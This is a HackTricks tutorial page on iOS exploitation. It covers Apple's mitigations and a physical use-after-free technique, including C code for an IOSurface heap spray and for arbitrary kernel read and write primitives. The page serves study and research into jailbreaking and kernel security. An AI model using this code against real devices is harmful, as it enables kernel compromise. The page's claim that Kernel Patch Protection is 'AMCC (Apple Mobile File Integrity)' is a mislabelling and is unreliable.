iOS Exploiting
Reading time: 12 minutes
tip
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the š¬ Discord group or the telegram group or follow us on Twitter š¦ @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
iOS Exploit Mitigations
- Code Signing in iOS works by requiring every piece of executable code (apps, libraries, extensions, etc.) to be cryptographically signed with a certificate issued by Apple. When code is loaded, iOS verifies the digital signature against Appleās trusted root. If the signature is invalid, missing, or modified, the OS refuses to run it. This prevents attackers from injecting malicious code into legitimate apps or running unsigned binaries, effectively stopping most exploit chains that rely on executing arbitrary or tampered code.
- CoreTrust is the iOS subsystem responsible for enforcing code signing at runtime. It directly verifies signatures using Appleās root certificate without relying on cached trust stores, meaning only binaries signed by Apple (or with valid entitlements) can execute. CoreTrust ensures that even if an attacker tampers with an app after installation, modifies system libraries, or tries to load unsigned code, the system will block execution unless the code is still properly signed. This strict enforcement closes many post-exploitation vectors that older iOS versions allowed through weaker or bypassable signature checks.
- Data Execution Prevention (DEP) marks memory regions as non-executable unless they explicitly contain code. This stops attackers from injecting shellcode into data regions (like the stack or heap) and running it, forcing them to rely on more complex techniques like ROP (Return-Oriented Programming).
- ASLR (Address Space Layout Randomization) randomizes the memory addresses of code, libraries, stack, and heap every time the system runs. This makes it much harder for attackers to predict where useful instructions or gadgets are, breaking many exploit chains that depend on fixed memory layouts.
- KASLR (Kernel ASLR) applies the same randomization concept to the iOS kernel. By shuffling the kernelās base address at each boot, it prevents attackers from reliably locating kernel functions or structures, raising the difficulty of kernel-level exploits that would otherwise gain full system control.
- Kernel Patch Protection (KPP) also known as AMCC (Apple Mobile File Integrity) in iOS, continuously monitors the kernelās code pages to ensure they havenāt been modified. If any tampering is detectedāsuch as an exploit trying to patch kernel functions or insert malicious codeāthe device will immediately panic and reboot. This protection makes persistent kernel exploits far harder, as attackers canāt simply hook or patch kernel instructions without triggering a system crash.
- Kernel Text Readonly Region (KTRR) is a hardware-based security feature introduced on iOS devices. It uses the CPUās memory controller to mark the kernelās code (text) section as permanently read-only after boot. Once locked, even the kernel itself cannot modify this memory region. This prevents attackersāand even privileged codeāfrom patching kernel instructions at runtime, closing off a major class of exploits that relied on modifying kernel code directly.
- Pointer Authentication Codes (PAC) use cryptographic signatures embedded into unused bits of pointers to verify their integrity before use. When a pointer (like a return address or function pointer) is created, the CPU signs it with a secret key; before dereferencing, the CPU checks the signature. If the pointer was tampered with, the check fails and execution stops. This prevents attackers from forging or reusing corrupted pointers in memory corruption exploits, making techniques like ROP or JOP much harder to pull off reliably.
- Privilege Access never (PAN) is a hardware feature that prevents the kernel (privileged mode) from directly accessing user-space memory unless it explicitly enables access. This stops attackers who gained kernel code execution from easily reading or writing user memory to escalate exploits or steal sensitive data. By enforcing strict separation, PAN reduces the impact of kernel exploits and blocks many common privilege-escalation techniques.
- Page Protection Layer (PPL) is an iOS security mechanism that protects critical kernel-managed memory regions, especially those related to code signing and entitlements. It enforces strict write protections using the MMU (Memory Management Unit) and additional checks, ensuring that even privileged kernel code cannot arbitrarily modify sensitive pages. This prevents attackers who gain kernel-level execution from tampering with security-critical structures, making persistence and code-signing bypasses significantly harder.
Physical use-after-free
This is a summary from the post from https://alfiecg.uk/2024/09/24/Kernel-exploit.html moreover further information about exploit using this technique can be found in https://github.com/felix-pb/kfd
Memory management in XNU
The virtual memory address space for user processes on iOS spans from 0x0 to 0x8000000000. However, these addresses donāt directly map to physical memory. Instead, the kernel uses page tables to translate virtual addresses into actual physical addresses.
Levels of Page Tables in iOS
Page tables are organized hierarchically in three levels:
- L1 Page Table (Level 1):
- Each entry here represents a large range of virtual memory.
- It covers 0x1000000000 bytes (or 256 GB) of virtual memory.
- L2 Page Table (Level 2):
- An entry here represents a smaller region of virtual memory, specifically 0x2000000 bytes (32 MB).
- An L1 entry may point to an L2 table if it can't map the entire region itself.
- L3 Page Table (Level 3):
- This is the finest level, where each entry maps a single 4 KB memory page.
- An L2 entry may point to an L3 table if more granular control is needed.
Mapping Virtual to Physical Memory
- Direct Mapping (Block Mapping):
- Some entries in a page table directly map a range of virtual addresses to a contiguous range of physical addresses (like a shortcut).
- Pointer to Child Page Table:
- If finer control is needed, an entry in one level (e.g., L1) can point to a child page table at the next level (e.g., L2).
Example: Mapping a Virtual Address
Letās say you try to access the virtual address 0x1000000000:
- L1 Table:
- The kernel checks the L1 page table entry corresponding to this virtual address. If it has a pointer to an L2 page table, it goes to that L2 table.
- L2 Table:
- The kernel checks the L2 page table for a more detailed mapping. If this entry points to an L3 page table, it proceeds there.
- L3 Table:
- The kernel looks up the final L3 entry, which points to the physical address of the actual memory page.
Example of Address Mapping
If you write the physical address 0x800004000 into the first index of the L2 table, then:
- Virtual addresses from 0x1000000000 to 0x1002000000 map to physical addresses from 0x800004000 to 0x802004000.
- This is a block mapping at the L2 level.
Alternatively, if the L2 entry points to an L3 table:
- Each 4 KB page in the virtual address range 0x1000000000 -> 0x1002000000 would be mapped by individual entries in the L3 table.
Physical use-after-free
A physical use-after-free (UAF) occurs when:
- A process allocates some memory as readable and writable.
- The page tables are updated to map this memory to a specific physical address that the process can access.
- The process deallocates (frees) the memory.
- However, due to a bug, the kernel forgets to remove the mapping from the page tables, even though it marks the corresponding physical memory as free.
- The kernel can then reallocate this "freed" physical memory for other purposes, like kernel data.
- Since the mapping wasnāt removed, the process can still read and write to this physical memory.
This means the process can access pages of kernel memory, which could contain sensitive data or structures, potentially allowing an attacker to manipulate kernel memory.
Exploitation Strategy: Heap Spray
Since the attacker canāt control which specific kernel pages will be allocated to freed memory, they use a technique called heap spray:
- The attacker creates a large number of IOSurface objects in kernel memory.
- Each IOSurface object contains a magic value in one of its fields, making it easy to identify.
- They scan the freed pages to see if any of these IOSurface objects landed on a freed page.
- When they find an IOSurface object on a freed page, they can use it to read and write kernel memory.
More info about this in https://github.com/felix-pb/kfd/tree/main/writeups
Step-by-Step Heap Spray Process
- Spray IOSurface Objects: The attacker creates many IOSurface objects with a special identifier ("magic value").
- Scan Freed Pages: They check if any of the objects have been allocated on a freed page.
- Read/Write Kernel Memory: By manipulating fields in the IOSurface object, they gain the ability to perform arbitrary reads and writes in kernel memory. This lets them:
- Use one field to read any 32-bit value in kernel memory.
- Use another field to write 64-bit values, achieving a stable kernel read/write primitive.
Generate IOSurface objects with the magic value IOSURFACE_MAGIC to later search for:
void spray_iosurface(io_connect_t client, int nSurfaces, io_connect_t **clients, int *nClients) {
if (*nClients >= 0x4000) return;
for (int i = 0; i < nSurfaces; i++) {
fast_create_args_t args;
lock_result_t result;
size_t size = IOSurfaceLockResultSize;
args.address = 0;
args.alloc_size = *nClients + 1;
args.pixel_format = IOSURFACE_MAGIC;
IOConnectCallMethod(client, 6, 0, 0, &args, 0x20, 0, 0, &result, &size);
io_connect_t id = result.surface_id;
(*clients)[*nClients] = id;
*nClients = (*nClients) += 1;
}
}
Search for IOSurface
objects in one freed physical page:
int iosurface_krw(io_connect_t client, uint64_t *puafPages, int nPages, uint64_t *self_task, uint64_t *puafPage) {
io_connect_t *surfaceIDs = malloc(sizeof(io_connect_t) * 0x4000);
int nSurfaceIDs = 0;
for (int i = 0; i < 0x400; i++) {
spray_iosurface(client, 10, &surfaceIDs, &nSurfaceIDs);
for (int j = 0; j < nPages; j++) {
uint64_t start = puafPages[j];
uint64_t stop = start + (pages(1) / 16);
for (uint64_t k = start; k < stop; k += 8) {
if (iosurface_get_pixel_format(k) == IOSURFACE_MAGIC) {
info.object = k;
info.surface = surfaceIDs[iosurface_get_alloc_size(k) - 1];
if (self_task) *self_task = iosurface_get_receiver(k);
goto sprayDone;
}
}
}
}
sprayDone:
for (int i = 0; i < nSurfaceIDs; i++) {
if (surfaceIDs[i] == info.surface) continue;
iosurface_release(client, surfaceIDs[i]);
}
free(surfaceIDs);
return 0;
}
Achieving Kernel Read/Write with IOSurface
After achieving control over an IOSurface object in kernel memory (mapped to a freed physical page accessible from userspace), we can use it for arbitrary kernel read and write operations.
Key Fields in IOSurface
The IOSurface object has two crucial fields:
- Use Count Pointer: Allows a 32-bit read.
- Indexed Timestamp Pointer: Allows a 64-bit write.
By overwriting these pointers, we redirect them to arbitrary addresses in kernel memory, enabling read/write capabilities.
32-Bit Kernel Read
To perform a read:
- Overwrite the use count pointer to point to the target address minus a 0x14-byte offset.
- Use the
get_use_count
method to read the value at that address.
uint32_t get_use_count(io_connect_t client, uint32_t surfaceID) {
uint64_t args[1] = {surfaceID};
uint32_t size = 1;
uint64_t out = 0;
IOConnectCallMethod(client, 16, args, 1, 0, 0, &out, &size, 0, 0);
return (uint32_t)out;
}
uint32_t iosurface_kread32(uint64_t addr) {
uint64_t orig = iosurface_get_use_count_pointer(info.object);
iosurface_set_use_count_pointer(info.object, addr - 0x14); // Offset by 0x14
uint32_t value = get_use_count(info.client, info.surface);
iosurface_set_use_count_pointer(info.object, orig);
return value;
}
64-Bit Kernel Write
To perform a write:
- Overwrite the indexed timestamp pointer to the target address.
- Use the
set_indexed_timestamp
method to write a 64-bit value.
void set_indexed_timestamp(io_connect_t client, uint32_t surfaceID, uint64_t value) {
uint64_t args[3] = {surfaceID, 0, value};
IOConnectCallMethod(client, 33, args, 3, 0, 0, 0, 0, 0, 0);
}
void iosurface_kwrite64(uint64_t addr, uint64_t value) {
uint64_t orig = iosurface_get_indexed_timestamp_pointer(info.object);
iosurface_set_indexed_timestamp_pointer(info.object, addr);
set_indexed_timestamp(info.client, info.surface, value);
iosurface_set_indexed_timestamp_pointer(info.object, orig);
}
Exploit Flow Recap
- Trigger Physical Use-After-Free: Free pages are available for reuse.
- Spray IOSurface Objects: Allocate many IOSurface objects with a unique "magic value" in kernel memory.
- Identify Accessible IOSurface: Locate an IOSurface on a freed page you control.
- Abuse Use-After-Free: Modify pointers in the IOSurface object to enable arbitrary kernel read/write via IOSurface methods.
With these primitives, the exploit provides controlled 32-bit reads and 64-bit writes to kernel memory. Further jailbreak steps could involve more stable read/write primitives, which may require bypassing additional protections (e.g., PPL on newer arm64e devices).
tip
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the š¬ Discord group or the telegram group or follow us on Twitter š¦ @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.